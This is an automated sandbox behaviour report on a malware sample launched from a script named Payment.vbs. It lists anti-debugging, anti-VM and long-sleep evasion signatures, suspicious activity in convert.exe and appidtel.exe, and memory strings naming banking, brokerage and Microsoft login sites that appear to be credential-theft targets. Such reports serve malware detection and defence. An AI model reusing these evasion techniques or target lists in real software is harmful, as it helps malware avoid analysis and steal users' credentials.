Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB4430154

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\appidtel.exe

Code function: 10_2_0397D1C0 rdtsc

10_2_0397D1C0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2870	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2356	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 901	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 499	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4538	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5231	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\appidtel.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\convert.exe	API coverage: 1.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 2870 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep count: 2356 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816	Thread sleep count: 4538 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416	Thread sleep count: 5231 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe TID: 5984	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2084	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 62v53-Zo.19.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: wscript.exe, 00000000.00000003.2237011145.000002AAA8628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pBimoLvibqemuGW@
Source: 62v53-Zo.19.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 62v53-Zo.19.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: wscript.exe, 00000000.00000003.2356219177.000002AAAA601000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pBimoLvibqemuGW
Source: 62v53-Zo.19.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 62v53-Zo.19.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: svchost.exe, 0000001B.00000002.3539084412.0000021B3DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.3540606559.0000021B42E42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.3540671763.0000021B42E56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 62v53-Zo.19.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 62v53-Zo.19.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: wscript.exe, 00000000.00000003.2355026871.000002AAA868D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2355751447.000002AAA86CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2356926443.000002AAAA501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236842751.000002AAAA430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2356219177.000002AAAA601000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236789299.000002AAA86CA000.00000004.00000020.00020000.00000000.sdmp, Payment.vbs	Binary or memory string: pBimoLvibqemuGW = "GNPOmRvLiTCWsbi"
Source: 62v53-Zo.19.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 62v53-Zo.19.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: mNqSPruzCXM.exe, 00000018.00000002.3536283378.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: powershell.exe, 00000008.00000002.2481444868.000001B5FF6D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWY
Source: 62v53-Zo.19.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 62v53-Zo.19.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 62v53-Zo.19.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 62v53-Zo.19.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 62v53-Zo.19.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\appidtel.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\appidtel.exe

Code function: 10_2_0397D1C0 rdtsc

10_2_0397D1C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\appidtel.exe

Code function: 10_2_004179B3 LdrLoadDll,

10_2_004179B3

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D539D mov eax, dword ptr fs:[00000030h]	10_2_039D539D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h]	10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h]	10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h]	10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0395739A mov eax, dword ptr fs:[00000030h]	10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0395739A mov eax, dword ptr fs:[00000030h]	10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h]	10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h]	10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h]	10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392438F mov eax, dword ptr fs:[00000030h]	10_2_0392438F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392438F mov eax, dword ptr fs:[00000030h]	10_2_0392438F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039333A0 mov eax, dword ptr fs:[00000030h]	10_2_039333A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039333A0 mov eax, dword ptr fs:[00000030h]	10_2_039333A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039233A5 mov eax, dword ptr fs:[00000030h]	10_2_039233A5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BB3D0 mov ecx, dword ptr fs:[00000030h]	10_2_039BB3D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BC3CD mov eax, dword ptr fs:[00000030h]	10_2_039BC3CD
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039863C0 mov eax, dword ptr fs:[00000030h]	10_2_039863C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D53FC mov eax, dword ptr fs:[00000030h]	10_2_039D53FC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039363FF mov eax, dword ptr fs:[00000030h]	10_2_039363FF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF3E6 mov eax, dword ptr fs:[00000030h]	10_2_039BF3E6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03920310 mov ecx, dword ptr fs:[00000030h]	10_2_03920310
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398930B mov eax, dword ptr fs:[00000030h]	10_2_0398930B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398930B mov eax, dword ptr fs:[00000030h]	10_2_0398930B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398930B mov eax, dword ptr fs:[00000030h]	10_2_0398930B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A30B mov eax, dword ptr fs:[00000030h]	10_2_0393A30B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A30B mov eax, dword ptr fs:[00000030h]	10_2_0393A30B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A30B mov eax, dword ptr fs:[00000030h]	10_2_0393A30B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC310 mov ecx, dword ptr fs:[00000030h]	10_2_038FC310
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C132D mov eax, dword ptr fs:[00000030h]	10_2_039C132D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C132D mov eax, dword ptr fs:[00000030h]	10_2_039C132D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392F32A mov eax, dword ptr fs:[00000030h]	10_2_0392F32A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F7330 mov eax, dword ptr fs:[00000030h]	10_2_038F7330
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD34C mov eax, dword ptr fs:[00000030h]	10_2_038FD34C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD34C mov eax, dword ptr fs:[00000030h]	10_2_038FD34C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov ecx, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CA352 mov eax, dword ptr fs:[00000030h]	10_2_039CA352
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5341 mov eax, dword ptr fs:[00000030h]	10_2_039D5341
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9353 mov eax, dword ptr fs:[00000030h]	10_2_038F9353
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9353 mov eax, dword ptr fs:[00000030h]	10_2_038F9353
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907370 mov eax, dword ptr fs:[00000030h]	10_2_03907370
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907370 mov eax, dword ptr fs:[00000030h]	10_2_03907370
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907370 mov eax, dword ptr fs:[00000030h]	10_2_03907370
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A437C mov eax, dword ptr fs:[00000030h]	10_2_039A437C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF367 mov eax, dword ptr fs:[00000030h]	10_2_039BF367
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393329E mov eax, dword ptr fs:[00000030h]	10_2_0393329E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393329E mov eax, dword ptr fs:[00000030h]	10_2_0393329E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393E284 mov eax, dword ptr fs:[00000030h]	10_2_0393E284
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393E284 mov eax, dword ptr fs:[00000030h]	10_2_0393E284
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03980283 mov eax, dword ptr fs:[00000030h]	10_2_03980283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03980283 mov eax, dword ptr fs:[00000030h]	10_2_03980283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03980283 mov eax, dword ptr fs:[00000030h]	10_2_03980283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5283 mov eax, dword ptr fs:[00000030h]	10_2_039D5283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov eax, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov eax, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov ecx, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov ecx, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039972A0 mov eax, dword ptr fs:[00000030h]	10_2_039972A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039972A0 mov eax, dword ptr fs:[00000030h]	10_2_039972A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov ecx, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392F2D0 mov eax, dword ptr fs:[00000030h]	10_2_0392F2D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392F2D0 mov eax, dword ptr fs:[00000030h]	10_2_0392F2D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039092C5 mov eax, dword ptr fs:[00000030h]	10_2_039092C5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039092C5 mov eax, dword ptr fs:[00000030h]	10_2_039092C5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB2D3 mov eax, dword ptr fs:[00000030h]	10_2_038FB2D3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB2D3 mov eax, dword ptr fs:[00000030h]	10_2_038FB2D3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB2D3 mov eax, dword ptr fs:[00000030h]	10_2_038FB2D3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF2F8 mov eax, dword ptr fs:[00000030h]	10_2_039BF2F8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039102E1 mov eax, dword ptr fs:[00000030h]	10_2_039102E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039102E1 mov eax, dword ptr fs:[00000030h]	10_2_039102E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039102E1 mov eax, dword ptr fs:[00000030h]	10_2_039102E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F92FF mov eax, dword ptr fs:[00000030h]	10_2_038F92FF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
